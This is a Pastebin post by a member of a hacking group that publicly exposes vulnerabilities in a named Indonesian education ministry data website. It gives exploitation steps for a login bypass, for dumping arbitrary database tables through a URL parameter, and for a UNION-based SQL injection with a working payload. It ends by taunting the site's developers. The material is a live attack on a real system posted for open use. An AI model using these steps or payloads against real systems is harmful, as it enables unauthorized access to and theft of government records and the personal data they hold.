API tools faq
paste
Gh05t666nero

https://referensi.data.kemdikbud.go.id/ WeakSec

Gh05t666nero
Sep 2nd, 2020 (edited)
257
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.95 KB | None | 0 0
raw download clone embed print report
  1. Exposed by Gh05t666nero
  2. Contact me: [email protected]
  3. Telegram: t.me/indoghostsec
  4.  
  5. Thanks to all members of indoghostsec: Gh05t666include,SuhandiGhost,Yudi666gh05t,Gh05tXploit,Gh05t666nero,Hz3Gh05t,Gh05tDeenos_,MalikBot, Ahmad_Gans, NvZ666h05t,Moka666gh05t,
  6. Gh05t666fidachan,Mr.Medan,Prass7,Mr.quixter,Mr.4non,
  7. SEXYOU,Andrax,Mr.horden-999-,R-27, CtrlSec0
  8.  
  9.  
  10. Vulnerable Page:
  11. [*] https://referensi.data.kemdikbud.go.id/login.php
  12. [*] https://referensi.data.kemdikbud.go.id/ref_data.php?tb=
  13. [*] https://referensi.data.kemdikbud.go.id/index11.php?kode=
  14.  
  15.  
  16. Short Desc:
  17. [*] https://referensi.data.kemdikbud.go.id/login.php
  18. If we see the page looks normal, but if we try to log in automatically we are welcome to enter without any confirmation from the database storage.
  19. [*] https://referensi.data.kemdikbud.go.id/ref_data.php?tb=
  20. On this page we can find something interesting, that is, we can dump the table by simply entering the name of the table that we want to display.
  21. [*] https://referensi.data.kemdikbud.go.id/index11.php?kode=
  22. While on this page, we will find injectable SQL vulnerabilities.
  23.  
  24.  
  25. Exploitation:
  26. [*] https://referensi.data.kemdikbud.go.id/login.php
  27. #Do the exploitation by entering a string (') or backslash (\) then an error will occur and we will be redirected to the page "https://reference.data.kemdikbud.go.id/login-logout.php?st=login" However, if we enter the username and password at random then boom we are successfully logged in and redirected to the page "https://reference.data.kemdikbud.go.id/profilptk.php"
  28.  
  29. [*] https://referensi.data.kemdikbud.go.id/ref_data.php?tb=
  30. #Do the exploitation by fuzzing the vulnerable parameter "tb=" for example I want to display the Agama table in the database so I only need to put the value of Agama in the parameter, then the result "https://referensi.data.kemdikbud.go.id/ref_data.php?tb=Agama" Or if I want to display the akses_internet table then I just need to change the value Agama.
  31.  
  32. [*] https://referensi.data.kemdikbud.go.id/index11.php?kode=
  33. #To be honest, the vulnerable page is not only "index11.php" but "index * .php" in other words the index page whose name contains a number also suffers from the SQL Injection vulnerability:
  34. ---
  35. Parameter: kode (GET)
  36. Type: UNION query
  37. Title: Generic UNION query (NULL) - 65 columns
  38. Payload: kode=' UNION ALL SELECT NULL,CONCAT(CONCAT('qqqpq','ZWkwBETtZYvpSOKGUUGdqYuohQKIqAKHIpoZxJcQ'),'qqkpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nSwY
  39. ---
  40.  
  41.  
  42. All right, that's all from me, and I hope the developer of KEMDIKBUD is responsible for the above vulnerabilities if you don't want to, then please take responsibility for your negligence at the end, O BLIND SALARY Eaters
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!